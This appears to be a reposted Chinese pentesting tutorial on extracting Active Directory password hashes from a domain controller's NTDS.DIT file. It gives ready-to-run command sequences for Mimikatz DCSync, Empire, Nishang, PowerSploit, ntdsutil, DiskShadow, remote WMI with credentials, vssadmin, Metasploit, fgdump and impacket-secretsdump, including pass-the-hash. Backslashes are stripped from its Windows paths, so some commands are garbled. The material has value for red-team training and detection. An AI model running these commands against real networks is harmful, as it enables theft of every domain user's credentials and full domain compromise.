导出域内用户hash的几种方法

admin 2022年4月17日00:53:47评论356 views字数 5688阅读18分57秒阅读模式

在渗透测试期间,可以利用域管权限对域内用户hash进行导出和破解。这些域内用户hash存储在域控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如组成员身份和用户。


NTDS.DIT文件经常被操作系统使用,因此无法直接复制,一般可以在以下Windows位置找到此文件:


C:WindowsNTDSNTDS.dit


可以使用各种技术来提取此文件或存储在其中的信息,但是大多数技术都使用以下方法之一:


DRS

原生Windows二进制文件

WMI


接下来我们看看一般有哪些方法可以做到导出域内用户hash的方法


Mimikatz


Mimikatz有一个功能(dcsync),它利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值。此技术避免了直接使用域控制器进行身份验证的需要,因为它可以以域管理员的权限在任何机器上运行。


lsadump::dcsync /domain:pentestlab.local /all /csv


导出域内用户hash的几种方法


通过使用/ user参数指定域用户名,Mimikatz可以转储此特定用户的所有帐户信息,包括其密码哈希。


lsadump::dcsync /domain:pentestlab.local /user:test


导出域内用户hash的几种方法


或者直接在域控制器中执行Mimikatz通过lsass.exe进程转储密码哈希。



privilege::debug

lsadump::lsa /inject


导出域内用户hash的几种方法

检索出域用户的密码哈希值

导出域内用户hash的几种方法


Empire


PowerShell Empire有两个模块,利用域管权限通过DRS服务利用DCSync攻击检索域哈希。这些模块依赖于Invoke-Mimikatz PowerShell脚本来执行与DCSync相关的Mimikatz命令。以下模块将域哈希提取为类似于Metasploit hashdump命令输出的格式。


usemodule credentials/mimikatz/dcsync_hashdump


导出域内用户hash的几种方法

利用DCSync模块导出指定用户相关信息

导出域内用户hash的几种方法

导出域内用户hash的几种方法


Nishang


Nishang是一个PowerShell框架,可以利用其Copy-VSS脚本自动提取所需的文件:NTDS.DIT,SAM和SYSTEM。这些文件将被解压缩到当前工作目录或指定的任何其他文件夹中。


Import-Module .Copy-VSS.ps1

Copy-VSS

Copy-VSS -DestinationDir C:ShadowCopy


导出域内用户hash的几种方法


或者,可以通过加载PowerShell扩展来从现有的Meterpreter会话执行脚本。


load powershell

powershell_import /root/Copy-VSS.ps1

powershell_execute Copy-VSS


导出域内用户hash的几种方法

也可以使用命令powershell_shell建立直接PowerShell会话,以便在脚本导入现有Meterpreter会话后提取文件。


Copy-VSS

Copy-VSS -DestinationDir C:Ninja


导出域内用户hash的几种方法


PowerSploit


PowerSploit利用PowerShell脚本通过卷影备份服务创建可用于提取文件的新卷。


Import-Module .VolumeShadowCopyTools.ps1

New-VolumeShadowCopy -Volume C:

Get-VolumeShadowCopy 


导出域内用户hash的几种方法


或者,可以通过加载PowerShell扩展来从现有的Meterpreter会话执行它。


powershell_shell

New-VolumeShadowCopy -Volume C:

Get-VOlumeShadowCopy


导出域内用户hash的几种方法

然后,可以使用copy命令将文件从新卷复制到目标路径。


Invoke-DCSync


可以利用Invoke-DCSync(https://gist.github.com/monoxgas/9d238accd969550136db)来输出用户hash。生成四块内容Domain,User,RID和Hash。


Invoke-DCSync


导出域内用户hash的几种方法


可以使用参数-PWDumpFormat执行Invoke-DCSync将以以下格式检索哈希: user:id:lm:ntlm :::


Invoke-DCSync -PWDumpFormat


导出域内用户hash的几种方法


通过从现有的Meterpreter会话运行脚本,可以实现相同的输出。

导出域内用户hash的几种方法

使用PWDumpFormat:

导出域内用户hash的几种方法


ntdsutil


该NTDSUTIL是一个命令行工具,它是域控制器生态系统的一部分,其目的是为了使管理员能够访问和管理Windows Active Directory数据库。但是,渗透测试人员和红队可以滥用它来创建现有ntds.dit文件的快照,该文件可以复制到新位置以进行离线分析和密码哈希的提取。


ntdsutil

activate instance ntds

ifm

create full C:ntdsutil

quit

quit


导出域内用户hash的几种方法

将生成两个新文件夹:Active Directory和Registry。NTDS.DIT文件将保存在Active Directory中,SAM和SYSTEM文件将保存到Registry文件夹中。

导出域内用户hash的几种方法


DiskShadow


DiskShadow是Microsoft签名的二进制文件。其主要用于协助管理员执行与卷影复制服务(VSS)相关的操作。这个二进制文件有两个交互式和脚本模式,因此可以使用一个脚本文件,它将包含自动执行NTDS.DIT提取过程所需的所有命令。脚本文件可以包含以下行,以便创建新的卷影副本,装入新驱动器,执行复制命令并删除卷影副本。


set context persistent nowriters

add volume c: alias someAlias

create

expose %someAlias% z:

exec "cmd.exe" /c copy z:windowsntdsntds.dit c:exfilntds.dit

delete shadows volume %someAlias%

reset


这里需要注意,DiskShadow二进制文件需要从C: Windows System32路径执行。如果从另一个路径调用它,脚本将无法正确执行。


diskshadow.exe /s c:diskshadow.txt


导出域内用户hash的几种方法


直接从解释器运行以下命令将列出系统的所有可用卷影副本。


diskshadow

LIST SHADOWS ALL


导出域内用户hash的几种方法


复制system文件


reg.exe save hklmsystem c:exfilsystem.bak


导出域内用户hash的几种方法


WMI


可以通过WMI远程提取NTDS.DIT和SYSTEM文件。此技术使用vssadmin二进制文件来创建卷影副本。


wmic /node:dc /user:PENTESTLABDavid /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"


导出域内用户hash的几种方法


然后,它远程执行复制命令,以便将卷影副本中的NTDS.DIT文件解压缩到目标系统上的另一个目录中。


wmic /node:dc /user:PENTESTLABDavid /password:pentestlab123!! process call create "cmd /c copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSNTDS.dit C:tempntds.dit 2>&1"


导出域内用户hash的几种方法

这同样适用于SYSTEM文件。


wmic /node:dc /user:PENTESTLABDavid /password:pentestlab123!! process call create "cmd /c copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:tempSYSTEM.hive 2>&1"


导出域内用户hash的几种方法

然后,解压缩的文件可以从域控制器传输到另一个Windows系统,以转储域密码哈希值。


PS C:Userstest.PENTESTLAB> copy \10.0.0.1c$tempntds.dit C:temp

PS C:Userstest.PENTESTLAB> copy \10.0.0.1c$tempSYSTEM.hive C:temp


导出域内用户hash的几种方法

如果已生成Golden票证,则可以使用它通过Kerberos与域控制器进行身份验证,而不是凭据。


vssadmin


卷影副本是Windows命令行实用程序,使管理员可以备份计算机,卷和文件,即使它们正在被操作系统使用。卷影复制作为服务运行,并要求将文件系统格式化为NTFS,默认情况下所有现代操作系统都是如此。从Windows命令提示符执行以下操作将创建C:驱动器的快照,以便用户通常将无法访问的文件将其复制到另一个位置(本地文件夹,网络文件夹或可移动介质)。


vssadmin create shadow /for=C:


导出域内用户hash的几种方法

由于C:驱动器中的所有文件都已复制到另一个位置(HarddiskVolumeShadowCopy1),因此它们不会被操作系统直接使用,因此可以访问并复制到另一个位置。命令副本并将NTDS.DIT和SYSTEM文件复制到名为ShadowCopy的本地驱动器上的新创建文件夹中。


copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSNTDS.dit C:ShadowCopy

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:ShadowCopy


导出域内用户hash的几种方法


需要将这些文件从域控制器复制到另一个主机以进行进一步处理。

导出域内用户hash的几种方法



vssown


与vssadmin实用程序类似,它是一个可视化基本脚本,可以创建和删除卷影副本,从卸载的卷影副本运行任意可执行文件,以及启动和停止卷影复制服务。


cscript vssown.vbs /start

cscript vssown.vbs /create c

cscript vssown.vbs /list

cscript vssown.vbs /delete 


导出域内用户hash的几种方法

可以使用命令副本复制所需的文件。


copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy11windowsntdsntds.dit C:vssown

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy11windowssystem32configSYSTEM C:vssown

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy11windowssystem32configSAM C:vssown


导出域内用户hash的几种方法


Metasploit


Metasploit框架有一个模块,它通过服务器消息块(SMB)服务直接与域控制器进行身份验证,创建系统驱动器的卷影副本,并将NTDS.DIT和SYSTEM配置单元的副本下载到Metasploit目录中。这些文件可以与impacket等其他工具一起使用,这些工具可以执行活动目录密码哈希的提取。


auxiliary/admin/smb/psexec_ntdsgrab



导出域内用户hash的几种方法

还有一个后渗透利用模块,可以链接到现有的Meterpreter会话,以便通过ntdsutil方法检索域哈希。


windows/gather/credentials/domain_hashdump


导出域内用户hash的几种方法

或者,如果存在到域控制器的现有Meterpreter会话,则可以使用命令hashdump,这方法可能会使域控制器崩溃。


hashdump


导出域内用户hash的几种方法


fgdump


fgdump可提取的LanMan和NTLM密码哈希值。如果已获取本地管理员凭据,则可以在本地或远程执行。在执行期间,fgdump将尝试禁用可能在系统上运行的防病毒软件,如果成功,则会将所有数据写入两个文件中。如果存在防病毒或端点解决方案,则不应将fgdump用作转储密码哈希的方法以避免检测,因为大多数防病毒公司(包括Microsoft的Windows Defender)都会对其进行标记。


fgdump.exe


导出域内用户hash的几种方法

可以通过查看.pwdump文件的内容来检索密码哈希值。

导出域内用户hash的几种方法



NTDS Extraction


Impacket可用于执行各种任务,包括提取NTDS文件的内容。利用impacket-secretsdump模块需要系统和NTDS数据库文件。


impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL


导出域内用户hash的几种方法

此外,impacket可以通过使用hash传递从远程主机上转储域密码哈希NTDS.DIT文件。


impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/[email protected]



导出域内用户hash的几种方法


NTDSDumpEx也可以从Windows主机中提取域密码哈希值。


NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive


导出域内用户hash的几种方法

还有一个shell脚本adXtract(https://github.com/LordNem/adXtract),它可以将用户名和密码哈希导出可被John the Ripper和Hashcat破解的格式。


./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab


导出域内用户hash的几种方法

该脚本将所有信息写入项目名称下的各种文件中,当数据库文件NTDS的解密完成后,将用户列表和密码哈希值导出到控制台中。该脚本将提供有关域用户的大量信息,如下所示。

导出域内用户hash的几种方法

密码哈希将以下列格式显示。导出域内用户hash的几种方法


参考:https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

原文始发于微信公众号(中国白客联盟):导出域内用户hash的几种方法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月17日00:53:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   导出域内用户hash的几种方法http://cn-sec.com/archives/783409.html

发表评论

匿名网友 填写信息